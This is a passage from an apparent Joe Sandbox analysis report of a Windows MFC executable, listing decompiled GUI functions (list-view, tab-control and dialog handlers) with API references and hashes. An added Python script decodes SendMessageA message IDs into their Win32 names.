    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: MessageSend$#2864#3092#4055#5981
    • String ID:
    • API String ID: 2969049274-0
    • Opcode ID: 739a2a9b338157b2c19ea0bc97e000aefbe7e5df23c05ac39721daea940fb8e6
    • Instruction ID: d456cf7f0d0394f52ce11dd12a4313192f647fbef472a737afac07924053a22e
    • Opcode Fuzzy Hash: 739a2a9b338157b2c19ea0bc97e000aefbe7e5df23c05ac39721daea940fb8e6
    • Instruction Fuzzy Hash: CEF08235500201BAD720B726CC09F97B7A4EF95730F018A2AF0A4271E18BF8A8918B54
    Uniqueness

    Uniqueness Score: -1.00%
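    The report lists every SendMessageA call only by its raw uMsg value (0000000E, 0000130B, 0000100C and so on), which an analyst otherwise has to look up by hand. The decoder below is an added example written for this page; it is neither part of the Joe Sandbox report nor code recovered from the sample. Its input is the API lines exactly as they appear in this section (copied inline as constructed sample input), it resolves the message IDs through a table built from the public winuser.h/commctrl.h constants, and it deliberately leaves WM_USER-relative values it cannot name (00000401, 00000407 in E0040CB16) marked as control-specific, because the report does not record which control class owns the receiving HWND. Treating the 000000FF rendering of the LVM_GETNEXTITEM iStart argument as the -1 shown in the C view is an assumption about the report's formatting.

```python
"""
Decoder for the SendMessageA argument lists in a Joe Sandbox "APIs" section.

Added example for this page, not part of the Joe Sandbox report and not code
from the analysed sample. REPORT_LINES is copied from this report section;
message names come from the public Win32 headers (winuser.h, commctrl.h).
The report does not say which control class receives a message, so
WM_USER-relative values missing from the table are flagged, not guessed.
"""
import re
from typing import Dict, List, Optional

WM_USER = 0x0400
WM_APP = 0x8000
LVM_FIRST = 0x1000
TCM_FIRST = 0x1300

# Message IDs that occur in this section, named from winuser.h / commctrl.h.
MESSAGES: Dict[int, str] = {
    0x000D: "WM_GETTEXT",
    0x000E: "WM_GETTEXTLENGTH",
    0x00F5: "BM_CLICK",
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 8: "LVM_DELETEITEM",
    LVM_FIRST + 12: "LVM_GETNEXTITEM",
    LVM_FIRST + 23: "LVM_EDITLABELA",
    TCM_FIRST + 11: "TCM_GETCURSEL",
}

LVNI_SELECTED = 0x0002  # LVM_GETNEXTITEM lParam flag (commctrl.h)

# Constructed sample input: lines copied from the "APIs" lists of this section.
REPORT_LINES: List[str] = [
    "SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC",
    "SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B",
    "SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0041ACC7",
    "SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0040EDCB",
    "SendMessageA.USER32(?,00001017,00000000,00000000), ref: 0040EDDB",
    "SendMessageA.USER32(?,00001008,00000000,00000000), ref: 0040ED51",
    "SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040ED60",
    "SendMessageA.USER32(?,000000F5,00000000,00000000), ref: 0040ED89",
    "SendMessageA.USER32(?,00000401,?,00000000), ref: 0040CB42",
    "SendMessageA.USER32(?,00000407,00000000,?), ref: 0040CB52",
]

LINE_RE = re.compile(
    r"SendMessageA\.USER32\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def parse_arg(tok: str) -> Optional[int]:
    """Report arguments are 8-hex-digit literals (optionally negative) or '?'."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) & 0xFFFFFFFF


def decode_msg(msg: int) -> str:
    """Name a uMsg value, or flag it as control-specific when it cannot be named."""
    if msg in MESSAGES:
        return MESSAGES[msg]
    if WM_USER <= msg < WM_APP:
        return f"WM_USER+{msg - WM_USER} (control-specific, not resolved)"
    return f"0x{msg:04X} (unknown)"


def decode_line(line: str) -> Optional[dict]:
    """Return {'ref','msg','name','note'} for a SendMessageA line, else None."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    args = [parse_arg(a) for a in m.group("args").split(",")]
    if len(args) != 4 or args[1] is None:
        return None
    _hwnd, msg, wparam, lparam = args
    note = ""
    if msg == LVM_FIRST + 12 and lparam is not None:
        # Assumption: the report prints the 'push -1' immediate as 000000FF (the C view shows 0xffffffff).
        start = "iStart=-1 (search from the top)" if wparam in (0xFF, 0xFFFFFFFF) else f"iStart={wparam}"
        flags = "LVNI_SELECTED" if lparam & LVNI_SELECTED else f"flags=0x{lparam:X}"
        note = f"{start}, {flags}"
    return {"ref": m.group("ref").upper(), "msg": msg, "name": decode_msg(msg), "note": note}


def decode_report(lines: List[str]) -> List[dict]:
    """Decode every SendMessageA line in the given report excerpt, in order."""
    out = []
    for line in lines:
        d = decode_line(line)
        if d is not None:
            out.append(d)
    return out


if __name__ == "__main__":
    for d in decode_report(REPORT_LINES):
        print(f"{d['ref']}: {d['name']} {d['note']}".rstrip())
```

Run it and the refs read as one line each: 0041ACC7 decodes to TCM_GETCURSEL, and 0040EDCB/0040EDDB to LVM_GETNEXTITEM (iStart -1, LVNI_SELECTED) followed by LVM_EDITLABELA, which is what makes E0040ED90 an F2-to-rename handler for a list view. The same header lookup settles the two virtual-key compares in that function: 0x2E is VK_DELETE and 0x71 is VK_F2.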

    C-Code - Quality: 79%
    			E0041B155(intOrPtr* __ecx) {                        // constructor shape: EH state counts up as members are built, vtable pointer written last
    				void* __esi;
    				void* _t14;
    				void* _t15;
    				intOrPtr* _t25;
    				void* _t27;
    
    				_t14 = E0043E4E0(0x441505, _t27);               // __EH_prolog
    				_push(__ecx);
    				_t25 = __ecx;                                   // this
    				_push( *((intOrPtr*)(_t27 + 8)));               // first stack argument
    				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
    				_push(0x9c);                                    // 0x9C
    				L0043E054();                                    // MFC42 #324(this, 0x9C, arg0); the report's APIs list for this function is empty, the ordinals come from its API ID line
    				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;       // EH state 0
    				L0043DDD8();                                    // MFC42 #540 (the ordinal called twice here)
    				 *(_t27 - 4) = 1;
    				L0043DDD8();                                    // MFC42 #540
    				 *(_t27 - 4) = 2;
    				_t15 = L00404F04(_t14, __ecx + 0x68, __ecx);    // member object at this+0x68
    				 *(_t27 - 4) = 3;
    				L00404F04(_t15, _t25 + 0xbc, _t25);             // member object at this+0xBC
    				 *_t25 = 0x4481d8;                              // vtable pointer
    				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));       // unregister the exception frame
    				return _t25;
    			}

    Statement addresses: 0x0041b15a 0x0041b15f 0x0041b161 0x0041b163 0x0041b166 0x0041b169 0x0041b16e 0x0041b173 0x0041b17a 0x0041b182 0x0041b186 0x0041b18e 0x0041b192 0x0041b19d 0x0041b1a1 0x0041b1a9 0x0041b1b2 0x0041b1ba

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#324H_prolog
    • String ID:
    • API String ID: 3562008183-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0040CB16(void* __ecx, long _a4) {
    				struct HWND__* _t8;
    				long _t9;
    				void* _t16;
    
    				_t16 = __ecx;
    				_t8 = __ecx + 0x54;
    				if(_t8 != 0) {
    					_t8 =  *(_t8 + 0x20);
    				}
    				_t9 = IsWindow(_t8);
    				if(_t9 != 0) {
    					SendMessageA( *(_t16 + 0x74), 0x401,  *(_t16 + 0x4c), 0);
    					_t9 = SendMessageA( *(_t16 + 0x74), 0x407, 0, _a4);
    				}
    				_push(_a4);
    				L0043DE56();
    				return _t9;
    			}

    APIs
    • IsWindow.USER32(?), ref: 0040CB24
    • SendMessageA.USER32(?,00000401,?,00000000), ref: 0040CB42
    • SendMessageA.USER32(?,00000407,00000000,?), ref: 0040CB52
    • #5290.MFC42(?), ref: 0040CB5B
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: MessageSend$#5290Window
    • String ID:
    • API String ID: 2009533309-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 21%
    			E0041BB1C(void* __ecx, intOrPtr _a4) {
    				void* _t7;
    				intOrPtr _t9;
    
    				_t9 = _a4;
    				_push(__ecx + 0x178);
    				_push(0x46b);
    				_push(_t9);
    				L0043E084();
    				_push(__ecx + 0x17c);
    				_push(0x46c);
    				_push(_t9);
    				L0043E084();
    				_t7 = __ecx + 0x180;
    				_push(_t7);
    				_push(0x472);
    				_push(_t9);
    				L0043E084();
    				_push(__ecx + 0x64);
    				_push(0x496);
    				_push(_t9);
    				L0043DF7C();
    				return _t7;
    			}

    APIs
    • #2363.MFC42(?,0000046B,?), ref: 0041BB31
    • #2363.MFC42(?,0000046C,?,?,0000046B,?), ref: 0041BB43
    • #2363.MFC42(?,00000472,?,?,0000046C,?,?,0000046B,?), ref: 0041BB55
    • #2302.MFC42(?,00000496,?,?,00000472,?,?,0000046C,?,?,0000046B,?), ref: 0041BB64
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2363$#2302
    • String ID:
    • API String ID: 2762476921-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 21%
    			E00419EC5(void* __ecx, intOrPtr _a4) {
    				void* _t7;
    				intOrPtr _t9;
    
    				_t9 = _a4;
    				_push(__ecx + 0xd8);
    				_push(0x43f);
    				_push(_t9);
    				L0043E05A();
    				_push(__ecx + 0x68);
    				_push(0x5360);
    				_push(_t9);
    				L0043DF7C();
    				_t7 = __ecx + 0xdc;
    				_push(_t7);
    				_push(0x43e);
    				_push(_t9);
    				L0043E05A();
    				_push(__ecx + 0xe0);
    				_push(0x438);
    				_push(_t9);
    				L0043E05A();
    				return _t7;
    			}

    APIs
    • #2370.MFC42(?,0000043F,?), ref: 00419EDA
    • #2302.MFC42(?,00005360,?,?,0000043F,?), ref: 00419EE9
    • #2370.MFC42(?,0000043E,?,?,00005360,?,?,0000043F,?), ref: 00419EFB
    • #2370.MFC42(?,00000438,?,?,0000043E,?,?,00005360,?,?,0000043F,?), ref: 00419F0D
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2370$#2302
    • String ID:
    • API String ID: 1508513658-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0041B1D9(intOrPtr __ecx) {
    				void* __esi;
    				void* _t15;
    				void* _t16;
    				void* _t17;
    				intOrPtr _t26;
    				void* _t28;
    
    				_t15 = E0043E4E0(0x441539, _t28);
    				_push(__ecx);
    				_t26 = __ecx;
    				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
    				 *(_t28 - 4) = 3;
    				_t16 = L00404F36(_t15, __ecx + 0xbc, __ecx);
    				 *(_t28 - 4) = 2;
    				_t17 = L00404F36(_t16, _t26 + 0x68, _t26);
    				 *(_t28 - 4) = 1;
    				L0043DD36();
    				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
    				L0043DD36();
    				 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
    				L0043E04E();
    				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
    				return _t17;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#641H_prolog
    • String ID:
    • API String ID: 1638354951-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0042A660(CHAR* _a4, signed int _a8, signed int _a12) {
    				int _t9;
    				CHAR* _t17;
    
    				_t17 = _a4;
    				GetModuleFileNameA(0, _t17, 0x103);
    				_t9 = lstrlenA(_t17);
    				 *( &(_t17[_t9]) - lstrlenA( *(0x454cc8 + _a12 * 4))) =  *( &(_t17[_t9]) - lstrlenA( *(0x454cc8 + _a12 * 4))) & 0x00000000;
    				return lstrcatA(_t17,  *(0x454cc8 + _a8 * 4));
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
    • lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
    • lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
    • lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: lstrlen$FileModuleNamelstrcat
    • String ID:
    • API String ID: 3539138998-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040CE9C(intOrPtr __ecx) {
    				void* _t11;
    				intOrPtr _t21;
    				void* _t23;
    
    				_t11 = E0043E4E0(0x43fe1d, _t23);
    				_push(__ecx);
    				_t21 = __ecx;
    				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
    				L0043DDD8();
    				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
    				L0043DDD8();
    				 *(_t23 - 4) = 1;
    				L0043DDD8();
    				 *(_t23 - 4) = 2;
    				 *((intOrPtr*)(__ecx)) = 0x4459f4;
    				E0040C258(_t11, __ecx);
    				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
    				return _t21;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040CEA1
    • #540.MFC42(?,?,0040CE35,?,?,00403F1E), ref: 0040CEB0
    • #540.MFC42(?,?,0040CE35,?,?,00403F1E), ref: 0040CEBC
    • #540.MFC42(?,?,0040CE35,?,?,00403F1E), ref: 0040CEC8
      • Part of subcall function 0040C258: #860.MFC42(00000000,?,?,0040CEDE,?,?,0040CE35,?,?,00403F1E), ref: 0040C26C
      • Part of subcall function 0040C258: #860.MFC42(00000000,00000000,?,?,0040CEDE,?,?,0040CE35,?,?,00403F1E), ref: 0040C275
      • Part of subcall function 0040C258: #860.MFC42(00000000,00000000,00000000,?,?,0040CEDE,?,?,0040CE35,?,?,00403F1E), ref: 0040C27E
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540#860$H_prolog
    • String ID:
    • API String ID: 232038355-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E0040B7B2(void* __ecx) {
    				void* _t9;
    
    				L0043DF94();
    				_push( *((intOrPtr*)(__ecx + 0x64)) + 0x768);
    				_push(0x42d);
    				L0043E066();
    				L0043E15C();
    				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x13f) & 0x000000ff);
    				_push(0x421);
    				L0043DF82();
    				E0040B78F( *( *((intOrPtr*)(__ecx + 0x64)) + 0x13f) & 0x000000ff, __ecx);
    				_t9 = 1;
    				return _t9;
    			}

    APIs
    • #4710.MFC42 ref: 0040B7B5
    • #3092.MFC42(0000042D,?), ref: 0040B7CA
    • #6199.MFC42(0000042D,?), ref: 0040B7D1
    • #1779.MFC42(00000421,?,0000042D,?), ref: 0040B7E8
      • Part of subcall function 0040B78F: #4055.MFC42(00000421), ref: 0040B797
      • Part of subcall function 0040B78F: #3092.MFC42(0000042D,00000000,00000421), ref: 0040B7A4
      • Part of subcall function 0040B78F: #2642.MFC42(0000042D,00000000,00000421), ref: 0040B7AB
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092$#1779#2642#4055#4710#6199
    • String ID:
    • API String ID: 2831561238-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040ABBB(intOrPtr _a4, char* _a8) {
    
    				if(_a4 != 0) {
    					if(strncmp(_a8, "TMsgForm", 8) != 0) {
    						goto L1;
    					}
    					return E0040FF68(_a4, _t6, "TPanel", _t6, "TPageControlEx", _t6) & 0xffffff00 | _t8 != 0x00000000;
    				}
    				L1:
    				return 0;
    			}

    APIs
    • strncmp.MSVCRT(?,TMsgForm,00000008), ref: 0040ABD1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: strncmp
    • String ID: TMsgForm$TPageControlEx$TPanel
    • API String ID: 1114863663-2490181851
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E0041BE8F(void* __eax, void* __ecx) {
    				void* _t1;
    				void* _t6;
    
    				_t1 = __eax;
    				_push(0x470);
    				L0043DFA6();
    				_push(0x46a);
    				_t6 = __eax;
    				L0043DFA6();
    				if(__eax == 0) {
    					_t6 = 0;
    				}
    				_push(_t6);
    				_push(0x472);
    				L0043E066();
    				L0043E07E();
    				return _t1;
    			}

    APIs
    • #4055.MFC42(00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BE98
    • #4055.MFC42(0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?), ref: 0041BEA6
    • #3092.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEB9
    • #2642.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEC0
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #4055$#2642#3092
    • String ID:
    • API String ID: 3952013578-0
    • Opcode ID: 2cb54ace12dfecbf32c695aba5c35e288bc8968944dd5b09ecee395656da1955
    • Instruction ID: bac585d85d1f5dbe8450b7088d4e2b39350a9b59ab7ac699c8f03e0361cc7c72
    • Opcode Fuzzy Hash: 2cb54ace12dfecbf32c695aba5c35e288bc8968944dd5b09ecee395656da1955
    • Instruction Fuzzy Hash: C6D0A761B4562022E93831777D1BE5F045ACBC5F78F01102FB3459B2C1EDDC8C4202AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 44%
    			E004280C6(void* __eax, void* __ecx, intOrPtr _a4) {
    				intOrPtr _v4;
    
    				_push(_a4);
    				_push(0x494);
    				L0043E066();
    				L0043E07E();
    				_push(_v4);
    				_push(0x3e8);
    				L0043E066();
    				L0043E07E();
    				return __eax;
    			}




    0x004280c9
    0x004280cd
    0x004280d2
    0x004280d9
    0x004280de
    0x004280e4
    0x004280e9
    0x004280f0
    0x004280f6

    APIs
    • #3092.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D2
    • #2642.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D9
    • #3092.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280E9
    • #2642.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280F0
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2642#3092
    • String ID:
    • API String ID: 2547810013-0
    • Opcode ID: f6507cafcd9f491414e5a13a668111bdf1f9364e3df3fff9b73c95afa83f921c
    • Instruction ID: 75f2788d3cc892f8fe8f43fcdb502d123ad8815563ef5ba78f98519614733e38
    • Opcode Fuzzy Hash: f6507cafcd9f491414e5a13a668111bdf1f9364e3df3fff9b73c95afa83f921c
    • Instruction Fuzzy Hash: CBD0A931702330A7EA2C33B3D90695E18A2CBC8B14F00182F32041B2E2ECF948414269
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0041F1C9(void* __ecx) {
    				struct HWND__* _t3;
    				int _t4;
    
    				_t3 = GetParent( *(__ecx + 0x20));
    				_push(_t3);
    				L0043DD9C();
    				_t4 = PostMessageA( *(_t3 + 0x20), 0x470, 0, 4);
    				L0043E390();
    				return _t4;
    			}





    0x0041f1cf
    0x0041f1d5
    0x0041f1d6
    0x0041f1e7
    0x0041f1ef
    0x0041f1f5

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2864#4976MessageParentPost
    • String ID:
    • API String ID: 2938294679-0
    • Opcode ID: 5b96c708a9c3b30ac8aa50ef02652ca609893a0e14cf334195c577124ad5a397
    • Instruction ID: 2c1217a8bab253be4dc45f1c433a9b3c50de2e6f17c6b952c585fbd10f4c1097
    • Opcode Fuzzy Hash: 5b96c708a9c3b30ac8aa50ef02652ca609893a0e14cf334195c577124ad5a397
    • Instruction Fuzzy Hash: 95D0A9B2202320ABEA103730AC0AF4A3A34AB89714F02016AB345AA0F18BB428405A4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0041F2AD(void* __ecx) {
    				struct HWND__* _t3;
    				int _t4;
    
    				_t3 = GetParent( *(__ecx + 0x20));
    				_push(_t3);
    				L0043DD9C();
    				_t4 = PostMessageA( *(_t3 + 0x20), 0x470, 0, 3);
    				L0043E390();
    				return _t4;
    			}





    0x0041f2b3
    0x0041f2b9
    0x0041f2ba
    0x0041f2cb
    0x0041f2d3
    0x0041f2d9

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2864#4976MessageParentPost
    • String ID:
    • API String ID: 2938294679-0
    • Opcode ID: 517837f705007262550dc7d399950dc175bc89c4ac3d55b0685010da5d16c413
    • Instruction ID: 42d3c5b659a0db7424e3072eccbe8246ec77a3a44a103b73831d04e44e6851ea
    • Opcode Fuzzy Hash: 517837f705007262550dc7d399950dc175bc89c4ac3d55b0685010da5d16c413
